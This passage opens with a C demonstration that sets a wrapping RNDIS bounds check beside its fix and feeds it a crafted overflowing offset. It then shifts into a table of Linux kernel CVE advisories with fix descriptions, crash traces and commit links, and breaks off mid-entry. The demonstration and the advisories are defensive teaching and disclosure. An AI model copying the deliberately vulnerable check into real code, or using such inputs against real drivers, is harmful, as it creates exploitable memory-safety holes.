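bool rndis_bounds_ok_vuln(uint32_t off, uint32_t len)
{
    return (REPLY_HDR + off + len) <= CONTROL_BUFFER_SIZE;
}

/* Post-fix check: compare each term on its own, no sum that can wrap. */
bool rndis_bounds_ok_fixed(uint32_t off, uint32_t len)
{
    if (off > CONTROL_BUFFER_SIZE - REPLY_HDR)
        return false;
    if (len > CONTROL_BUFFER_SIZE - REPLY_HDR - off)
        return false;
    return true;
}

/* Ground truth in 64-bit arithmetic: does [8+off, 8+off+len) lie inside
 * the buffer? Used only to show where the wrapped pointer would really land. */
bool reply_inside_buffer(uint32_t off, uint32_t len)
{
    uint64_t start = (uint64_t)REPLY_HDR + off;
    return start + len <= CONTROL_BUFFER_SIZE;
}

/* Copies the reply payload out of the control buffer using the fixed check.
 * Returns the payload length, or -1 if the device-supplied pair is rejected. */
int rndis_extract_reply(const uint8_t *buf, uint32_t off, uint32_t len,
                        uint8_t *out, size_t out_sz)
{
    if (!rndis_bounds_ok_fixed(off, len) || len > out_sz)
        return -1;
    memcpy(out, buf + REPLY_HDR + off, len);
    return (int)len;
}

/* Output of the sample query below. */
uint8_t demo_mac[6];

/* Constructed response: a 6-byte MAC (the RNDIS_OID_802_3_PERMANENT_ADDRESS
 * reply) placed 16 bytes past the header, so off = 16, len = 6. */
int sample_query_mac(uint8_t mac[6])
{
    static uint8_t ctrl[CONTROL_BUFFER_SIZE];
    const uint8_t sample_mac[6] = { 0x02, 0x00, 0x00, 0x00, 0x00, 0x06 };

    memset(ctrl, 0, sizeof ctrl);
    memcpy(ctrl + REPLY_HDR + 16, sample_mac, sizeof sample_mac);
    return rndis_extract_reply(ctrl, 16, 6, mac, 6);
}

int main(void)
{
    uint32_t off = 0xFFFFFFF8u, len = 16;   /* hostile pair: 8 + off wraps to 0 */

    printf("off=0x%08x len=%u: vuln check %s, fixed check %s, really inside %s\n",
           off, len,
           rndis_bounds_ok_vuln(off, len) ? "PASSES" : "rejects",
           rndis_bounds_ok_fixed(off, len) ? "passes" : "REJECTS",
           reply_inside_buffer(off, len) ? "yes" : "no");
    printf("sample MAC query returned %d bytes\n", sample_query_mac(demo_mac));
    return 0;
}
```

The general rule the fix applies: when `a + b + c` is compared against a limit and any operand is attacker-supplied, either widen the arithmetic or check each operand against the remaining headroom, as the fixed function does.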
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: pinctrl: rockchip: Fix refcount leak in rockchip_pinctrl_parse_groups of_find_node_by_phandle() returns a node pointer with refcount incremented; we should use of_node_put() on it when not needed anymore. Add missing of_node_put() to avoid refcount leak. | 2025-12-24 | not yet calculated | CVE-2023-54111 | https://git.kernel.org/stable/c/aa017ab5716c9157c65fdce061c4a4a568af53a8 https://git.kernel.org/stable/c/5868013522297bf628eee4322d99d6d4de4f308e https://git.kernel.org/stable/c/954a7a0011d94475f8ba5ceb77a5d11e01cf402f https://git.kernel.org/stable/c/d562054a3a2eede3507a5461011ee82b671fcb88 https://git.kernel.org/stable/c/0f735f232ff59863e0b6ebac0849d637e215a9c2 https://git.kernel.org/stable/c/dbef00ef4b9b98d15183340396e5df0fa7a860d8 https://git.kernel.org/stable/c/3c40b34e3462aab12af3dba77d2e1602afc72e80 https://git.kernel.org/stable/c/c818ae563bf99457f02e8170aabd6b174f629f65 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: kcm: Fix memory leak in error path of kcm_sendmsg() syzbot reported a memory leak like below: BUG: memory leak unreferenced object 0xffff88810b088c00 (size 240): comm "syz-executor186", pid 5012, jiffies 4294943306 (age 13.680s) hex dump (first 32 bytes): 00 89 08 0b 81 88 ff ff 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ backtrace: [<ffffffff83e5d5ff>] __alloc_skb+0x1ef/0x230 net/core/skbuff.c:634 [<ffffffff84606e59>] alloc_skb include/linux/skbuff.h:1289 [inline] [<ffffffff84606e59>] kcm_sendmsg+0x269/0x1050 net/kcm/kcmsock.c:815 [<ffffffff83e479c6>] sock_sendmsg_nosec net/socket.c:725 [inline] [<ffffffff83e479c6>] sock_sendmsg+0x56/0xb0 net/socket.c:748 [<ffffffff83e47f55>] ____sys_sendmsg+0x365/0x470 net/socket.c:2494 [<ffffffff83e4c389>] ___sys_sendmsg+0xc9/0x130 net/socket.c:2548 [<ffffffff83e4c536>] __sys_sendmsg+0xa6/0x120 net/socket.c:2577 [<ffffffff84ad7bb8>] do_syscall_x64 arch/x86/entry/common.c:50 [inline] [<ffffffff84ad7bb8>] do_syscall_64+0x38/0xb0 arch/x86/entry/common.c:80 [<ffffffff84c0008b>] entry_SYSCALL_64_after_hwframe+0x63/0xcd In kcm_sendmsg(), kcm_tx_msg(head)->last_skb is used as a cursor to append newly allocated skbs to 'head'. If some bytes are copied, an error occurs and the code jumps to the out_error label, 'last_skb' is left unmodified. A later kcm_sendmsg() will use an obsolete 'last_skb' reference, corrupting the 'head' frag_list and causing the leak. This patch fixes this issue by properly updating the last allocated skb in 'last_skb'. | 2025-12-24 | not yet calculated | CVE-2023-54112 | https://git.kernel.org/stable/c/8dc7eb757b1652b82725f32e0c89a1e9f6c0e13b https://git.kernel.org/stable/c/5e5554389397e98fafb9efe395d8b4830dd5f042 https://git.kernel.org/stable/c/479c71cda14b3c3a6515773faa39055333eaa2b7 https://git.kernel.org/stable/c/33db24ad811b3576a0c2f8862506763f2be925b0 https://git.kernel.org/stable/c/97275339c34cfbccd65e87bc38fd910ae66c48ba https://git.kernel.org/stable/c/16989de75497574b5fafd174c0c233d5a86858b7 https://git.kernel.org/stable/c/af8085e0fc3207ecbf8b9e7a635c790e36d058c6 https://git.kernel.org/stable/c/c821a88bd720b0046433173185fd841a100d44ad |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: rcu: dump vmalloc memory info safely Currently, for double invoke call_rcu(), we will dump rcu_head object memory info; if the object is not allocated from the slab allocator, vmalloc_dump_obj() will be invoked and the vmap_area_lock spinlock needs to be held. Since call_rcu() can be invoked in interrupt context, there is a possibility of spinlock deadlock scenarios. And in Preempt-RT kernel, the rcutorture test also triggers the following lockdep warning: BUG: sleeping function called from invalid context at kernel/locking/spinlock_rt.c:48 in_atomic(): 1, irqs_disabled(): 1, non_block: 0, pid: 1, name: swapper/0 preempt_count: 1, expected: 0 RCU nest depth: 1, expected: 1 3 locks held by swapper/0/1: #0: ffffffffb534ee80 (fullstop_mutex){+.+.}-{4:4}, at: torture_init_begin+0x24/0xa0 #1: ffffffffb5307940 (rcu_read_lock){....}-{1:3}, at: rcu_torture_init+0x1ec7/0x2370 #2: ffffffffb536af40 (vmap_area_lock){+.+.}-{3:3}, at: find_vmap_area+0x1f/0x70 irq event stamp: 565512 hardirqs last enabled at (565511): [<ffffffffb379b138>] __call_rcu_common+0x218/0x940 hardirqs last disabled at (565512): [<ffffffffb5804262>] rcu_torture_init+0x20b2/0x2370 softirqs last enabled at (399112): [<ffffffffb36b2586>] __local_bh_enable_ip+0x126/0x170 softirqs last disabled at (399106): [<ffffffffb43fef59>] inet_register_protosw+0x9/0x1d0 Preemption disabled at: [<ffffffffb58040c3>] rcu_torture_init+0x1f13/0x2370 CPU: 0 PID: 1 Comm: swapper/0 Tainted: G W 6.5.0-rc4-rt2-yocto-preempt-rt+ #15 Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.16.2-0-gea1b7a073390-prebuilt.qemu.org 04/01/2014 Call Trace: <TASK> dump_stack_lvl+0x68/0xb0 dump_stack+0x14/0x20 __might_resched+0x1aa/0x280 ? __pfx_rcu_torture_err_cb+0x10/0x10 rt_spin_lock+0x53/0x130 ? find_vmap_area+0x1f/0x70 find_vmap_area+0x1f/0x70 vmalloc_dump_obj+0x20/0x60 mem_dump_obj+0x22/0x90 __call_rcu_common+0x5bf/0x940 ? debug_smp_processor_id+0x1b/0x30 call_rcu_hurry+0x14/0x20 rcu_torture_init+0x1f82/0x2370 ? __pfx_rcu_torture_leak_cb+0x10/0x10 ? __pfx_rcu_torture_leak_cb+0x10/0x10 ? __pfx_rcu_torture_init+0x10/0x10 do_one_initcall+0x6c/0x300 ? debug_smp_processor_id+0x1b/0x30 kernel_init_freeable+0x2b9/0x540 ? __pfx_kernel_init+0x10/0x10 kernel_init+0x1f/0x150 ret_from_fork+0x40/0x50 ? __pfx_kernel_init+0x10/0x10 ret_from_fork_asm+0x1b/0x30 </TASK> The previous patch fixes this by using the deadlock-safe best-effort version of find_vm_area. However, in case of failure print the fact that the pointer was a vmalloc pointer so that we print at least something. | 2025-12-24 | not yet calculated | CVE-2023-54113 | https://git.kernel.org/stable/c/0a22f9c17b1aa2a35b5eedee928f7841595b55cd https://git.kernel.org/stable/c/3f7a4e88e40e38c0b16a4bcb599b7b1d8c81440d https://git.kernel.org/stable/c/dddca4c46ec92f83449bc91dd199f46a89e066be https://git.kernel.org/stable/c/8fb1601ec0a2c4c34fc2170af767e5c2a6400573 https://git.kernel.org/stable/c/c83ad36a18c02c0f51280b50272327807916987f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: nsh: Use correct mac_offset to unwind gso skb in nsh_gso_segment() As the call trace shows, skb_panic was caused by wrong skb->mac_header in nsh_gso_segment(): invalid opcode: 0000 [#1] PREEMPT SMP KASAN PTI CPU: 3 PID: 2737 Comm: syz Not tainted 6.3.0-next-20230505 #1 RIP: 0010:skb_panic+0xda/0xe0 call Trace: skb_push+0x91/0xa0 nsh_gso_segment+0x4f3/0x570 skb_mac_gso_segment+0x19e/0x270 __skb_gso_segment+0x1e8/0x3c0 validate_xmit_skb+0x452/0x890 validate_xmit_skb_list+0x99/0xd0 sch_direct_xmit+0x294/0x7c0 __dev_queue_xmit+0x16f0/0x1d70 packet_xmit+0x185/0x210 packet_snd+0xc15/0x1170 packet_sendmsg+0x7b/0xa0 sock_sendmsg+0x14f/0x160 The root cause is: nsh_gso_segment() uses skb->network_header - nhoff to reset mac_header in skb_gso_error_unwind() if inner-layer protocol gso fails. However, skb->network_header may be reset by inner-layer protocol gso function e.g. mpls_gso_segment. skb->mac_header reset by the inaccurate network_header will be larger than skb headroom. nsh_gso_segment nhoff = skb->network_header - skb->mac_header; __skb_pull(skb,nsh_len) skb_mac_gso_segment mpls_gso_segment skb_reset_network_header(skb);//skb->network_header+=nsh_len return -EINVAL; skb_gso_error_unwind skb_push(skb, nsh_len); skb->mac_header = skb->network_header - nhoff; // skb->mac_header > skb->headroom, cause skb_push panic Use correct mac_offset to restore mac_header and get rid of nhoff. | 2025-12-24 | not yet calculated | CVE-2023-54114 | https://git.kernel.org/stable/c/2f88c8d38ecf5ed0273f99a067246899ba499eb2 https://git.kernel.org/stable/c/d2309e0cb27b6871b273fbc1725e93be62570d86 https://git.kernel.org/stable/c/435855b0831b351cb72cb38369ee33122ce9574c https://git.kernel.org/stable/c/02b20e0bc0c2628539e9e518dc342787c3332de2 https://git.kernel.org/stable/c/cdd8160dcda1fed2028a5f96575a84afc23aff7d https://git.kernel.org/stable/c/6fbedf987b6b8ed54a50e2205d998eb2c8be72f9 https://git.kernel.org/stable/c/cb38e62922aa3991793344b5a5870e7291c74a44 https://git.kernel.org/stable/c/c83b49383b595be50647f0c764a48c78b5f3c4f8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: pcmcia: rsrc_nonstatic: Fix memory leak in nonstatic_release_resource_db() When nonstatic_release_resource_db() frees all resources associated with a PCMCIA socket, it forgets to free socket_data too, causing a memory leak observable with kmemleak: unreferenced object 0xc28d1000 (size 64): comm "systemd-udevd", pid 297, jiffies 4294898478 (age 194.484s) hex dump (first 32 bytes): 00 00 00 00 00 00 00 00 f0 85 0e c3 00 00 00 00 ................ 00 00 00 00 0c 10 8d c2 00 00 00 00 00 00 00 00 ................ backtrace: [<ffda4245>] __kmem_cache_alloc_node+0x2d7/0x4a0 [<7e51f0c8>] kmalloc_trace+0x31/0xa4 [<d52b4ca0>] nonstatic_init+0x24/0x1a4 [pcmcia_rsrc] [<a2f13e08>] pcmcia_register_socket+0x200/0x35c [pcmcia_core] [<a728be1b>] yenta_probe+0x4d8/0xa70 [yenta_socket] [<c48fac39>] pci_device_probe+0x99/0x194 [<84b7c690>] really_probe+0x181/0x45c [<8060fe6e>] __driver_probe_device+0x75/0x1f4 [<b9b76f43>] driver_probe_device+0x28/0xac [<648b766f>] __driver_attach+0xeb/0x1e4 [<6e9659eb>] bus_for_each_dev+0x61/0xb4 [<25a669f3>] driver_attach+0x1e/0x28 [<d8671d6b>] bus_add_driver+0x102/0x20c [<df0d323c>] driver_register+0x5b/0x120 [<942cd8a4>] __pci_register_driver+0x44/0x4c [<e536027e>] __UNIQUE_ID___addressable_cleanup_module188+0x1c/0xfffff000 [iTCO_vendor_support] Fix this by freeing socket_data too. Tested on an Acer Travelmate 4002WLMi by manually binding/unbinding the yenta_cardbus driver (yenta_socket). | 2025-12-24 | not yet calculated | CVE-2023-54115 | https://git.kernel.org/stable/c/bde0b6da7bd893c37afaee3555cc3ac3be582313 https://git.kernel.org/stable/c/2d45e2be0be35a3d66863563ed2591ee18a6897e https://git.kernel.org/stable/c/22100df1d57f04cf2370d5347b9ef547f481deea https://git.kernel.org/stable/c/04bb8af40a7729c398ed4caea7e66cedd2881719 https://git.kernel.org/stable/c/97fd1c8e9c5aa833aab7e836760bc13103afa892 https://git.kernel.org/stable/c/e8a80cf06b4bb0396212289d651b384c949f09d0 https://git.kernel.org/stable/c/fd53a1f28faba2c4806c055e706a7721006291c1 https://git.kernel.org/stable/c/c85fd9422fe0f5d667305efb27f56d09eab120b0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/fbdev-generic: prohibit potential out-of-bounds access The fbdev test of IGT may write after EOF, which leads to out-of-bound access for drm drivers with fbdev-generic. For example, running the fbdev test on a x86+ast2400 platform, with 1680x1050 resolution, will cause the linux kernel to hang with the following call trace: Oops: 0000 [#1] PREEMPT SMP PTI [IGT] fbdev: starting subtest eof Workqueue: events drm_fb_helper_damage_work [drm_kms_helper] [IGT] fbdev: starting subtest nullptr RIP: 0010:memcpy_erms+0xa/0x20 RSP: 0018:ffffa17d40167d98 EFLAGS: 00010246 RAX: ffffa17d4eb7fa80 RBX: ffffa17d40e0aa80 RCX: 00000000000014c0 RDX: 0000000000001a40 RSI: ffffa17d40e0b000 RDI: ffffa17d4eb80000 RBP: ffffa17d40167e20 R08: 0000000000000000 R09: ffff89522ecff8c0 R10: ffffa17d4e4c5000 R11: 0000000000000000 R12: ffffa17d4eb7fa80 R13: 0000000000001a40 R14: 000000000000041a R15: ffffa17d40167e30 FS: 0000000000000000(0000) GS:ffff895257380000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: ffffa17d40e0b000 CR3: 00000001eaeca006 CR4: 00000000001706e0 Call Trace: <TASK> ? drm_fbdev_generic_helper_fb_dirty+0x207/0x330 [drm_kms_helper] drm_fb_helper_damage_work+0x8f/0x170 [drm_kms_helper] process_one_work+0x21f/0x430 worker_thread+0x4e/0x3c0 ? __pfx_worker_thread+0x10/0x10 kthread+0xf4/0x120 ? __pfx_kthread+0x10/0x10 ret_from_fork+0x2c/0x50 </TASK> CR2: ffffa17d40e0b000 ---[ end trace 0000000000000000 ]--- This is because the damage rectangles computed by the drm_fb_helper_memory_range_to_clip() function are not guaranteed to be bound in the screen's active display area. Possible reasons are: 1) Buffers are allocated in the granularity of page size, for mmap system call support. The shadow screen buffer consumed by fbdev emulation may also be chosen to be page size aligned. 2) The DIV_ROUND_UP() used in drm_fb_helper_memory_range_to_clip() will introduce an off-by-one error. For example, on a 16KB page size system, in order to store a 1920x1080 XRGB framebuffer, we need to allocate 507 pages. Unfortunately, the size 1920*1080*4 can not be divided exactly by 16KB. 1920 * 1080 * 4 = 8294400 bytes 506 * 16 * 1024 = 8290304 bytes 507 * 16 * 1024 = 8306688 bytes line_length = 1920*4 = 7680 bytes 507 * 16 * 1024 / 7680 = 1081.6 off / line_length = 507 * 16 * 1024 / 7680 = 1081 DIV_ROUND_UP(507 * 16 * 1024, 7680) will yield 1082 memcpy_toio() typically issues the copy line by line; when copying the last line, out-of-bound access will happen. Because: 1082 * line_length = 1082 * 7680 = 8309760, and 8309760 > 8306688 Note that userspace may still write to the invisible area if a larger buffer than width x stride is exposed. But it is not a big issue as long as there still have memory resolve the access if not drafting so far. - Also limit the y1 (Daniel) - keep fix patch it to minimal (Daniel) - screen_size is page size aligned because of it need mmap (Thomas) - Adding fixes tag (Thomas) | 2025-12-24 | not yet calculated | CVE-2023-54116 | https://git.kernel.org/stable/c/efd2821b8abeccb6b51423002e2a62921481a26e https://git.kernel.org/stable/c/251653fa974ea551a15d16cacfed7cde68cc7f87 https://git.kernel.org/stable/c/c8687694bb1f5c48134f152f8c5c2e53483eb99d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: s390/dcssblk: fix kernel crash with list_add corruption Commit fb08a1908cb1 ("dax: simplify the dax_device <-> gendisk association") introduced new logic for gendisk association, requiring drivers to explicitly call dax_add_host() and dax_remove_host(). For dcssblk driver, some dax_remove_host() calls were missing, e.g. in device remove path. The commit also broke error handling for out_dax case in device add path, resulting in an extra put_device() w/o the previous get_device() in that case. This led to stale xarray entries after device add / remove cycles. In the case when a previously used struct gendisk pointer (xarray index) would be used again, because blk_alloc_disk() happened to return such a pointer, the xa_insert() in dax_add_host() would fail and go to out_dax, doing the extra put_device() in the error path. In combination with an already flawed error handling in dcssblk (device_register() cleanup), which needs to be addressed in a separate patch, this resulted in a missing device_del() / klist_del(), and eventually in the kernel crash with list_add corruption on a subsequent device_add() / klist_add(). Fix this by adding the missing dax_remove_host() calls, and also move the put_device() in the error path to restore the previous logic. | 2025-12-24 | not yet calculated | CVE-2023-54117 | https://git.kernel.org/stable/c/6489ec0107860345bc57dcde39e63dfb05ac5c11 https://git.kernel.org/stable/c/b7ad75c77349beb4983b9f27108d9b3f33ae1413 https://git.kernel.org/stable/c/b5c531a9a7d8e047c90c909f09cef06a9f8e62f4 https://git.kernel.org/stable/c/c8f40a0bccefd613748d080147469a4652d6e74c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: serial: sc16is7xx: setup GPIO controller later in probe The GPIO controller component of the sc16is7xx driver is setup too early, which can result in a race condition where another device tries to utilise the GPIO lines before the sc16is7xx device has finished initialising. This issue manifests itself as an Oops when the GPIO lines are configured: Unable to handle kernel read from unreadable memory at virtual address ... pc : sc16is7xx_gpio_direction_output+0x68/0x108 [sc16is7xx] lr : sc16is7xx_gpio_direction_output+0x4c/0x108 [sc16is7xx] ... Call trace: sc16is7xx_gpio_direction_output+0x68/0x108 [sc16is7xx] gpiod_direction_output_raw_commit+0x64/0x318 gpiod_direction_output+0xb0/0x170 create_gpio_led+0xec/0x198 gpio_led_probe+0x16c/0x4f0 platform_drv_probe+0x5c/0xb0 really_probe+0xe8/0x448 driver_probe_device+0xe8/0x138 __device_attach_driver+0x94/0x118 bus_for_each_drv+0x8c/0xe0 __device_attach+0x100/0x1b8 device_initial_probe+0x28/0x38 bus_probe_device+0xa4/0xb0 deferred_probe_work_func+0x90/0xe0 process_one_work+0x1c4/0x480 worker_thread+0x54/0x430 kthread+0x138/0x150 ret_from_fork+0x10/0x1c This patch moves the setup of the GPIO controller functions to later in the probe function, ensuring the sc16is7xx device has already finished initialising by the time other devices try to make use of the GPIO lines. The error handling has also been reordered to reflect the new initialisation order. | 2025-12-24 | not yet calculated | CVE-2023-54118 | https://git.kernel.org/stable/c/17b96b5c19bec791b433890549e44ca523dc82aa https://git.kernel.org/stable/c/49b326ce8a686428d8cbb82ed74fc88ed3f95a51 https://git.kernel.org/stable/c/f57c2164d082a36d177ab7fbf54c18970df89c22 https://git.kernel.org/stable/c/b71ff206707855ce73c04794c76f7b678b2d4f72 https://git.kernel.org/stable/c/c8f71b49ee4d28930c4a6798d1969fa91dc4ef3e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: inotify: Avoid reporting event with invalid wd When inotify_freeing_mark() races with inotify_handle_inode_event() it can happen that inotify_handle_inode_event() sees that i_mark->wd got already reset to -1 and reports this value to userspace which can confuse the inotify listener. Avoid the problem by validating that wd is sensible (and pretend the mark got removed before the event got generated otherwise). | 2025-12-24 | not yet calculated | CVE-2023-54119 | https://git.kernel.org/stable/c/8fb33166aed888769ea63d6af49515893f8a1f14 https://git.kernel.org/stable/c/2d65c97777e5b4a845637800d5d7b648f5772106 https://git.kernel.org/stable/c/17ad86d8c12220de97e80d88b5b4c934a40e1812 https://git.kernel.org/stable/c/145f54ea336b06cf4f92eeee996f2ffca939ea43 https://git.kernel.org/stable/c/fb3294998489d39835006240e9c6e6b2ac62022e https://git.kernel.org/stable/c/a48bacee05860c6089c3482bcdc80720b0ee5732 https://git.kernel.org/stable/c/c915d8f5918bea7c3962b09b8884ca128bfd9b0c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: Fix race condition in hidp_session_thread There is a potential race condition in hidp_session_thread that may lead to use-after-free. For instance, the timer is active while hidp_del_timer is called in hidp_session_thread(). After hidp_session_put, then 'session' will be freed, causing kernel panic when hidp_idle_timeout is running. The solution is to use del_timer_sync instead of del_timer. Here is the call trace: ? hidp_session_probe+0x780/0x780 call_timer_fn+0x2d/0x1e0 __run_timers.part.0+0x569/0x940 hidp_session_probe+0x780/0x780 call_timer_fn+0x1e0/0x1e0 ktime_get+0x5c/0xf0 lapic_next_deadline+0x2c/0x40 clockevents_program_event+0x205/0x320 run_timer_softirq+0xa9/0x1b0 __do_softirq+0x1b9/0x641 __irq_exit_rcu+0xdc/0x190 irq_exit_rcu+0xe/0x20 sysvec_apic_timer_interrupt+0xa1/0xc0 | 2025-12-24 | not yet calculated | CVE-2023-54120 | https://git.kernel.org/stable/c/152f47bd6b995e0e98c85672f6d19894bc287ef2 https://git.kernel.org/stable/c/5f3d214d19899183d4e0cce7552998262112e4ab https://git.kernel.org/stable/c/8a99e6200c38b78a45dcd12a6bdc43fdf4dc36be https://git.kernel.org/stable/c/f7ec5ca433ceead8d9d78fd2febff094f289441d https://git.kernel.org/stable/c/0efb276d5848a3accc37c6f41b85e442c4768169 https://git.kernel.org/stable/c/f6719fd8f409fa1da8dc956e93822d25e1e8b360 https://git.kernel.org/stable/c/248af9feca062a4ca9c3f2ccf67056c8a5eb817f https://git.kernel.org/stable/c/c95930abd687fcd1aa040dc4fe90dff947916460 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: fix incorrect splitting in btrfs_drop_extent_map_range In production we were seeing a variety of WARN_ON()'s in the extent_map code, specifically in btrfs_drop_extent_map_range() when we have to call add_extent_mapping() for our second split. Consider the following extent map layout PINNED [0 16K) [32K, 48K) and then we call btrfs_drop_extent_map_range for [0, 36K), with skip_pinned == true. The initial loop will have start = 0 end = 36K len = 36K we will find the [0, 16k) extent, but since we are pinned we will skip it, which has this code start = em_end; if (end != (u64)-1) len = start + len - em_end; em_end here is 16K, so now the values are start = 16K len = 16K + 36K - 16K = 36K len should instead be 20K. This is a problem when we find the next extent at [32K, 48K), we need to split this extent to leave [36K, 48k), however the code for the split looks like this split->start = start + len; split->len = em_end - (start + len); In this case we have em_end = 48K split->start = 16K + 36K // this should be 16K + 20K split->len = 48K - (16K + 36K) // this overflows as 16K + 36K is 52K and now we have an invalid extent_map in the tree that potentially overlaps other entries in the extent map. Even in the non-overlapping case we will have split->start set improperly, which will cause problems with any block related calculations. We don't actually need len in this loop, we can simply use end as our end point, and only adjust start up when we find a pinned extent we need to skip. Adjust the logic to do this, which keeps us from inserting an invalid extent map. We only skip_pinned in the relocation case, so this is relatively rare, except in the case where you are running relocation a lot, which can happen with auto relocation on. | 2025-12-24 | not yet calculated | CVE-2023-54121 | https://git.kernel.org/stable/c/9f68e2105dd96cf0fafffffafb2337fbd0fbae1f https://git.kernel.org/stable/c/b43a4c99d878cf5e59040e45c96bb0a8358bfb3b https://git.kernel.org/stable/c/c962098ca4af146f2625ed64399926a098752c9c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/msm/dpu: Add check for cstate As kzalloc may fail and return NULL pointer, it should be better to check cstate in order to avoid the NULL pointer dereference in __drm_atomic_helper_crtc_reset. Patchwork: https://patchwork.freedesktop.org/patch/514163/ | 2025-12-24 | not yet calculated | CVE-2023-54122 | https://git.kernel.org/stable/c/a6afb8293ec0932f4ed0b7aecfc0ccc00f44dc2b https://git.kernel.org/stable/c/31f2f8de0ea7387cde18a24f94ba5e0b886b9842 https://git.kernel.org/stable/c/d4ba50614cb3f0686bbdb505af685d78e75861dc https://git.kernel.org/stable/c/42442d42c57b9fbc35cb5ef72c7e5347c5f7d082 https://git.kernel.org/stable/c/a52e5a002d18bffabff66f6f59a74f8e9aac5afe https://git.kernel.org/stable/c/c96988b7d99327bb08bd9efd29a203b22cd88ace |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: md/raid10: fix memleak for 'conf->bio_split' In the error path of raid10_run(), 'conf' needs to be freed; however, 'conf->bio_split' is missed and memory will be leaked. Since there are 3 places to free 'conf', factor out a helper to fix the problem. | 2025-12-24 | not yet calculated | CVE-2023-54123 | https://git.kernel.org/stable/c/133008af833b4f2e021d2c294c29c70364a3f0ba https://git.kernel.org/stable/c/b6460f68c1cc95a80d089af402be501619f228e4 https://git.kernel.org/stable/c/6361b0592b46c465ac926c1f3105d66c30d9658b https://git.kernel.org/stable/c/7f673fa34c0e3f95ee951a1bbf61791164871d2e https://git.kernel.org/stable/c/b21019a220d9cac08819bb6c63000de9ee61eb9e https://git.kernel.org/stable/c/5cba3e26c073b535e4e3b825ea481fb29c53943b https://git.kernel.org/stable/c/e2fec8d95353a48634b085011626ba3ec8ab8b1c https://git.kernel.org/stable/c/c9ac2acde53f5385de185bccf6aaa91cf9ac1541 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: f2fs: fix to drop all dirty pages during umount() if cp_error is set xfstest generic/361 reports a bug as below: f2fs_bug_on(sbi, sbi->fsync_node_num); kernel BUG at fs/f2fs/super.c:1627! RIP: 0010:f2fs_put_super+0x3a8/0x3b0 Call Trace: generic_shutdown_super+0x8c/0x1b0 kill_block_super+0x2b/0x60 kill_f2fs_super+0x87/0x110 deactivate_locked_super+0x39/0x80 deactivate_super+0x46/0x50 cleanup_mnt+0x109/0x170 __cleanup_mnt+0x16/0x20 task_work_run+0x65/0xa0 exit_to_user_mode_prepare+0x175/0x190 syscall_exit_to_user_mode+0x25/0x50 do_syscall_64+0x4c/0x90 entry_SYSCALL_64_after_hwframe+0x72/0xdc During umount(), if cp_error is set, f2fs_wait_on_all_pages() should not stop waiting for all F2FS_WB_CP_DATA pages to be written back; otherwise, fsync_node_num can be non-zero after f2fs_wait_on_all_pages(), causing this bug. In this case, to avoid a dead loop in f2fs_wait_on_all_pages(), it needs to drop all dirty pages rather than redirtying them. | 2025-12-24 | not yet calculated | CVE-2023-54124 | https://git.kernel.org/stable/c/92575f05a32dafb16348bfa5e62478118a9be069 https://git.kernel.org/stable/c/4ceedc2f8bdffb82e40b7d1bb912304f8e157cb1 https://git.kernel.org/stable/c/ad87bd313f70b51e48019d5ce2d02d73152356b3 https://git.kernel.org/stable/c/d8f4ad5f3979dbd8e6251259562f12472717883a https://git.kernel.org/stable/c/7741ddc882a0c806a6508ba8203c55a779db7a21 https://git.kernel.org/stable/c/82c3d6e9db41cbd3af1d4f90bdb441740b5fad10 https://git.kernel.org/stable/c/c9b3649a934d131151111354bcbb638076f03a30 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs/ntfs3: Return error for inconsistent extended attributes ntfs_read_ea is called when we want to read extended attributes. There are some sanity checks for the validity of the EAs. However, it fails to return a proper error code for the inconsistent attributes, which might lead to unpredicted memory accesses after return. [ 138.916927] BUG: KASAN: use-after-free in ntfs_set_ea+0x453/0xbf0 [ 138.923876] Write of size 4 at addr ffff88800205cfac by task poc/199 [ 138.931132] [ 138.933016] CPU: 0 PID: 199 Comm: poc Not tainted 6.2.0-rc1+ #4 [ 138.938070] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014 [ 138.947327] Call Trace: [ 138.949557] <TASK> [ 138.951539] dump_stack_lvl+0x4d/0x67 [ 138.956834] print_report+0x16f/0x4a6 [ 138.960798] ? ntfs_set_ea+0x453/0xbf0 [ 138.964437] ? kasan_complete_mode_report_info+0x7d/0x200 [ 138.969793] ? ntfs_set_ea+0x453/0xbf0 [ 138.973523] kasan_report+0xb8/0x140 [ 138.976740] ? ntfs_set_ea+0x453/0xbf0 [ 138.980578] __asan_store4+0x76/0xa0 [ 138.984669] ntfs_set_ea+0x453/0xbf0 [ 138.988115] ? __pfx_ntfs_set_ea+0x10/0x10 [ 138.993390] ? kernel_text_address+0xd3/0xe0 [ 138.998270] ? __kernel_text_address+0x16/0x50 [ 139.002121] ? unwind_get_return_address+0x3e/0x60 [ 139.005659] ? __pfx_stack_trace_consume_entry+0x10/0x10 [ 139.010177] ? arch_stack_walk+0xa2/0x100 [ 139.013657] ? filter_irq_stacks+0x27/0x80 [ 139.017018] ntfs_setxattr+0x405/0x440 [ 139.022151] ? __pfx_ntfs_setxattr+0x10/0x10 [ 139.026569] ? kvmalloc_node+0x2d/0x120 [ 139.030329] ? kasan_save_stack+0x41/0x60 [ 139.033883] ? kasan_save_stack+0x2a/0x60 [ 139.037338] ? kasan_set_track+0x29/0x40 [ 139.040163] ? kasan_save_alloc_info+0x1f/0x30 [ 139.043588] ? __kasan_kmalloc+0x8b/0xa0 [ 139.047255] ? __kmalloc_node+0x68/0x150 [ 139.051264] ? 